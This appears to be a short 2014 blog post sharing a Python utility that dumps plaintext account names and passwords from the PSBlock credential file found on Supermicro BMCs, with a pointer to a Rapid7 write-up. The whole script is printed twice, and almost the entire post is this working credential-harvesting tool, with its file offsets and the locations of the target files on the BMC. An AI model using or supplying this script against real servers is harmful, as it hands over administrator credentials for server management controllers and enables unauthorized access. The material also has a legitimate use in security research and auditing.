Jan 252014
A trivial utility to dump password/account information from a special file found on a SM BMC (see this R7 post about the PSBlock file.)
(Later edit – put a new version on github that fixes a bug)
#!/usr/bin/env python
# usage: $0 file
#
# (try to) Dump out passwords/accounts from a SM binary file;
# usually this is in /conf or /vm on the BMC, and goes by
# various names such as PSBlock, PSStore, PMConfig.dat, and
# the like. This has *only* been tested on PSBlock files,
# but the theory appears to be the same; find the first account
# and password pair and march through the file at regular
# intervals until you find all the matches.
#
import re
import sys
ACCOUNT_SIZE = 16
PASSWD_SIZE = 20 # IPMI 2.0
FIRST_ACCOUNT = 85 # the fun starts here
NEXT_ACCOUNT = 64 # N bytes later
MAX_ACCOUNTS = 9 # a guess
try:
sm = open(sys.argv[1], "rb")
except:
print("couldn't open %s" % sys.argv[1])
sys.exit(2)
# skip first 84 bytes
sm.seek(FIRST_ACCOUNT,0)
# loop for accounts/passwords
for i in range(0,MAX_ACCOUNTS + 1):
# go to the right place
sm.seek(FIRST_ACCOUNT + i * NEXT_ACCOUNT, 0)
# grabit
account = sm.read(ACCOUNT_SIZE)
passwd = sm.read(PASSWD_SIZE)
# strip nulls
account = re.sub('\000*$', '', account)
passwd = re.sub('\000*$', '', passwd)
if len(account) > 0 and account[0] != '\000':
print("Account [%d]: %s" % (i, account))
print("Password[%d]: %s" % (i, passwd))
sm.close()
# usage: $0 file
#
# (try to) Dump out passwords/accounts from a SM binary file;
# usually this is in /conf or /vm on the BMC, and goes by
# various names such as PSBlock, PSStore, PMConfig.dat, and
# the like. This has *only* been tested on PSBlock files,
# but the theory appears to be the same; find the first account
# and password pair and march through the file at regular
# intervals until you find all the matches.
#
import re
import sys
ACCOUNT_SIZE = 16
PASSWD_SIZE = 20 # IPMI 2.0
FIRST_ACCOUNT = 85 # the fun starts here
NEXT_ACCOUNT = 64 # N bytes later
MAX_ACCOUNTS = 9 # a guess
try:
sm = open(sys.argv[1], "rb")
except:
print("couldn't open %s" % sys.argv[1])
sys.exit(2)
# skip first 84 bytes
sm.seek(FIRST_ACCOUNT,0)
# loop for accounts/passwords
for i in range(0,MAX_ACCOUNTS + 1):
# go to the right place
sm.seek(FIRST_ACCOUNT + i * NEXT_ACCOUNT, 0)
# grabit
account = sm.read(ACCOUNT_SIZE)
passwd = sm.read(PASSWD_SIZE)
# strip nulls
account = re.sub('\000*$', '', account)
passwd = re.sub('\000*$', '', passwd)
if len(account) > 0 and account[0] != '\000':
print("Account [%d]: %s" % (i, account))
print("Password[%d]: %s" % (i, passwd))
sm.close()
Sorry, the comment form is closed at this time.